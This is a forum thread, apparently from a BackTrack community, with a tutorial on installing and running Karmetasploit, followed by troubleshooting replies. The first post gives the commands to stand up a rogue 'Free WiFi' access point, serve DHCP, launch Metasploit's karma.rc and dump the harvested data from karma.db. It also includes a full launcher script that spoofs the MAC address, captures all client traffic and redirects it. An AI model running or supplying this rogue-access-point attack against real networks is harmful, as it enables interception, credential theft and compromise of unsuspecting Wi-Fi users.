Results 1 to 8 of 8

Thread: Tutorial : Karmetasploit

  1. #1
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default Tutorial : Karmetasploit

    I put together this step by step tutorial for getting Karmetasploit installed and working under BT3. Most of this information can be found in other posts, but now its all in one place.

    Prerequisites:
    Latest version of Aircrack-ng:
    Code:
     svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
    Latest version of metasploit:
    Code:
    svn co http://metasploit.com/svn/framework3/trunk msf3
    Karmetasploit .rc file:
    http://metasploit.com/users/hdm/tools/karma.rc (save to /pentest/exploits/framework3/ (BT3 Beta) or /msf3 (BT3 final)

    Older release of DHCPD (newer release wont work on BT3 due to IPV6 issues)
    http://ftp.isc.org/isc/dhcp/dhcp-3.0.7.tar.gz

    Sqlite3
    http://www.sqlite.org/sqlite-3.6.4.tar.gz

    make && make install all these packages.

    Configuration
    Now configure your dhcpd configuration file. This is located in /etc/dhcpd.conf
    Paste the following into the file and save (providing your using 10.0.0.0/24 networking:
    Code:
    option domain-name-servers 10.0.0.1;
    
    default-lease-time 60;
    max-lease-time 72;
    
    ddns-update-style none;
    
    authoritative;
    
    log-facility local7;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
      option routers 10.0.0.1;
      option domain-name-servers 10.0.0.1;
    }
    You must manually create the dhcpd.leases file before running dhcpd.
    Code:
     touch /var/state/dhcp/dhcpd.leases
    Execution
    Commands are run assuming you are using a Realtek card. Change wlan0 to match your configuration.
    Code:
    airbase-ng -P -C 30 -e "Free WiFi" -v wlan0 
    ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    dhcpd -cf /etc/dhcpd.conf at0
    ifconfig at0 mtu 1400
    msfconsole -r karma.rc
    Now have your client attempt to connect to your "Free WiFi" access point. You should see a "Loading" screen in IE or Firefox. Now in Backtrack, open your sqlite database to see what you've gathered:
    Code:
    cd /root
    sqlite3 karma.db
    sqlite>.mode html
    sqlite>.output karma.html
    sqlite>select * from notes;
    sqlite>.quit
    Open the html file in your browser.

    If all these steps work, I'd recommend using this script by BadKarmaPR to automate the setup process:
    Code:
    #!/bin/bash
    #=================================================
    #
    # FILE: kmsapng.sh
    #
    # USAGE: ./kmsapng.sh <options>
    #
    # DESCRIPTION: Script to lunch Karmetasploit
    #
    # OPTIONS: Wireless car supported by Aircrack-ng for injection.
    #	   File with MAC addresses for filtering connection 
    # BUGS: Only has been tested with Atheros Realteck L8187 and Ralink 2750 cards.
    # NOTES: Latest version of SVN of Aircrack-ng as whell as latest drivers must me used.
    # AUTHOR: carlos_perez(at)darkoperator.com
    # VERSION: 0.2
    # CREATED: 09/23/2008 02:06:42 PM
    # REVISION:10/15/2008 5:00 PM added options for launching, only have spent 50 min 
    #          in total writing the script I know if I had more time I could add more to it.
    #TODO: Add option for crating valid AP using dnsmaq and ipfilters
    #=================================================
    #Initialize interface variable
    IW=
    #Initialize mode variable
    MODE=
    SSID="Free Wifi"
    #Variable with number of arguments passed to the script
    NUM=$#
    #Variable with log file location for trobleshooting
    LOGFILE=/root/karma.log
    A1="ath0"
    #Capture crtl-c and it will kill aproceed to clean up any process left 
    trap cleanup INT
    #Usage funtion for printing the help message
    function usage ()
    {
    	echo 'Karmetasploit AP launcher by Carlos Perez for Backtrack3'
    	echo 'Version 0.2'
    	echo 'carlos_perez[at]darkoperator.com'
      	echo "usage: kmsap.sh <options>"
    	echo " "
    	echo "Options:"
    	echo "-m <mode>        : Mode, either km for regular karmetasploit attack"
    	echo "                   or kmf for filtered attack where only targeted "
    	echo "                   clients can associate to the fake AP."
    	echo "-i <interface>   : Interface supported by aircrack-ng for injection"
    	echo "-f <filter file> : Text file with mac addresses of client computers"
    	echo "                   permited to connect to the fake AP."
    	echo "-s <ssid>        : SSID name used as the initial broadcast"
    	echo "-h               : This help message"
    	echo ""
    	echo "Note: mode and interface are required for both type of attacks"
    }
    #funtion to set the insteface in monitor mode
    function monitormode ()
    {
    
    	if [ $IW = $A1 ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1 &
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    		sleep 2
    	else
    		ifconfig $IW up >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		airmon-ng start $IW >> $LOGFILE 2>&1 &
    		sleep 2
    	fi
    
    } # ---------- end of function monitormode ----------
    #function for cleanning up any process that might have been left running
    function cleanup ()
    {
    	killall -9 dhcpd tcpdump airbase-ng >> $LOGFILE
    	echo > /var/state/dhcp/dhcpd.leases
    	airmon-ng stop $IW >> $LOGFILE
    	exit 1
    } # ---------- end of function cleanup ----------
    #Function for launching regular karmetasploit attack
    function apall ()
    {
    	modprobe tun	
    	echo -e "\033[1;32mstarting fake ap\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#specialy on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	sleep 15
    	
    }
    #Function for launching fake AP with MAC filtering
    function apfiltered ()
    {
    
    	modprobe tun
    	if [ -e $FILTER ]; then
    		echo -e "\033[1;32mstarting fake ap with MAC Filtering\033[1;37m"
    		airbase-ng -P -C 30 --clients $FILTER -e "$SSID" $IW >> $LOGFILE 2>&1 &
    	else
    		echo -e "\033[1;31mFilter File does not exist\033[1;37m"
    		echo $FILTER
    		cleanup
    	fi
    	#give enough time before next command for interface to come up
    	echo "This will take 15 seconds .............."
    	sleep 15
    }
    #funtion for setting MTU value, launching DHCP server, start packet capture
    #set the blackhole for any client with cached DNS entries launches metasploit
    function startinf () 
    {
    	#set the IP address that was configured in the dhcpd.conf file
    	#as the default geateway and DNS server
    	ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    	if [ $? -eq 255 ]; then
    		echo -e "\033[1;31mIt appears the AP did not start check $LOGFILE for errors\033[1;37m"
    		cleanup
    	fi
    	#set mtu
    	ifconfig $IW mtu 1800 >> $LOGFILE 2>&1
    	if [ $? -ne 0 ]; then 
    		ifconfig at0 mtu 1400 2>&1 >> $LOGFILE
    	fi 
    	
    	sleep 2
    	#Clear any dhcp leases that might have been left behind
    	echo > /var/state/dhcp/dhcpd.leases
    	#start dhcpd daemon with special configuration file
    	dhcpd -cf /etc/dhcpd.conf at0 >> $LOGFILE 2>&1 &
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m"
    		cleanup
    	else
    		echo -e "\033[1;32mDHCPD started succesfully\033[1;37m"
    	fi
    	sleep 2
    	#capture all packets
    	echo -e "\033[1;32mStarting Packet capture to /root/kms.cap\033[1;37m"
    	tcpdump -ni at0 -s 0 -w /root/kms.cap >/dev/null 2>&1 &
    	#set Blackhole Routing to bypass cached DNS entries
    	iptables -t nat -A PREROUTING -i at0 -j REDIRECT
    	#start metasploit with special script
    	echo -e "\033[1;32mStarting Metasploit\033[1;37m"
    	/msf3/msfconsole -r /msf3/karma.rc && cleanup 
    
    } 
    
    #--------------------MAIN-----------------------
    while getopts ":m:i:f:s:" options; do
      case $options in
        m ) MODE=$OPTARG;;
        i ) IW=$OPTARG;;
        f ) FILTER=$OPTARG;;
        s ) SSID=$OPTARG;;
        h ) usage;;
        \? ) usage
             exit 1;;
        * ) usage
              exit 1;;
    
      esac
    done
    if [[ -n "$MODE" && -n "$IW" ]]; then
    
    	case $MODE in
    	km) monitormode 
         		apall
         		startinf ;;
    	kmf) monitormode
          		apfiltered 
          		startinf ;;
    	esac
    else
    	usage
    fi
    If all this works, we can move on to configuring "Wireless Key Grabber":
    http://forums.remote-exploit.org/showthread.php?t=21144

    *This post was put together with information from HDM, BadKarmaPR, PaulDotCom, leaferz, HM2075.

    William

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    Germany
    Posts
    6

    Default

    Hello williamc,

    at first, thank you for your tutorial! I tried to use it on my backtrack3 vm image, but i´ve problems with dhcpd. my clients doesnt get an ip address, so i searched the threads and posts, but i couldn´t find an anwser.

    i used dhcpd 3.0.6, so i think ipv6 should´t the problem
    the dhcpd.conf is exact the same
    aircrack and metsploit was updated via fast-track

    is perhaps my alfa usb rtl8187 card the problem?

    after airbase-ng -P -C 30 -e "Free WiFi" -v wlan0 my screen look like this:

    Code:
    15:50:25  Created tap interface at0
    15:50:25  Trying to set MTU on at0 to 1500
    15:50:25  Trying to set MTU on wlan0 to 1800
    error setting MTU on wlan0
    15:50:25  MTU on wlan0 remains at 1500
    15:50:25  Access Point with BSSID 00:06:A8:D4:BF:CE started.
    15:50:28  Got broadcast probe request from 00:21:5D:9E:28:9C
    ... snip ...
    16:02:06  Got directed probe request from 00:12:F0:24:21:8C - "Free Wifi"
    16:02:06  Got directed probe request from 00:12:F0:24:21:8C - "Free Wifi"
    16:02:06  Got directed probe request from 00:12:F0:24:21:8C - "Free Wifi"
    16:02:06  Got an auth request from 00:12:F0:24:21:8C (open system)
    16:02:06  Client 00:12:F0:24:21:8C associated (unencrypted) to ESSID: "Free Wifi"
    16:02:07  Got broadcast probe request from 00:12:F0:24:21:8C
    ... snip ...

    and dhcpd -cf /etc/dhcpd.conf at0
    Code:
    Internet Systems Consortium DHCP Server V3.0.6
    Copyright 2004-2007 Internet Systems Consortium.
    All rights reserved.
    For info, please visit .isc.org/sw/dhcp/
    Wrote 0 leases to leases file.
    Listening on LPF/at0/00:06:a8:d4:bf:ce/10.0.0/24
    Sending on   LPF/at0/00:06:a8:d4:bf:ce/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    so i put also the other commands and tried connect my faked ap, but i doesn´t work ... the client become no ip address

    thanks in advance

  3. #3
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I may have missed a step. Did you create your dhcpd.leases file? Use this command:
    Code:
     touch /var/state/dhcp/dhcpd.leases
    William

  4. #4
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Thanks for the great tutorial williamc. I'm just a bit unlucky :b

    Exactly the same problem as pascal, although I went a step further and watched wireshark on both backtrack and the "victim".
    The Vista box was sending DHCP Discover but BackTrack was seeing them as "malformed packets". Don't know what's going on, I'll get back if I find out but feel free to
    - Poul Wittig

  5. #5
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    What is your testing environment? Please post OS, Wireless drivers, etc. Did you try using the script if the manual method didn't work?

    William

  6. #6
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Im using VMWare with a rt2571WF chipset card (latest rt73enhanced driver) with the latest version of aircrack. The victim can connect but simply won't get an IP. No I haven't looked at the script I'll go ahead and do that right away.
    Btw, what is the reason you tell us to download dhcpd when it is contained in BackTrack already?
    - Poul Wittig

  7. #7

    Default

    Nice tutorial, short and simple. Your milage will vary depending on the card, I have been able o get the best results from Atheros and RT2700. When you get the Dnsmaq stuff working let me know and we van integrate it to the script I made if you like.

  8. #8
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    I believe my problem is that the wireless interface that will act as an AP is in the usb plug of the same computer which will connect with an internal card. In other words, they are extreamly close to each other. Wireshark is showing a lot of "Bogus fragment", "Link Data", "Malformed Packet".

    Sometimes I get lucky and it starts working. But it's rare.
    I'll see if it gets better once I get my Alfa in the mail.
    Oh and this link might be a good read people Karmetasploit
    Here is a script I made to create the fake AP and forward everything to eth0. I use OpenDNS as the dns in dhcpd.conf so I don't need dnsmasq.

    edit: deprecated. Read my tutorial http://forums.remote-exploit.org/showthread.php?t=19048
    - Poul Wittig

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •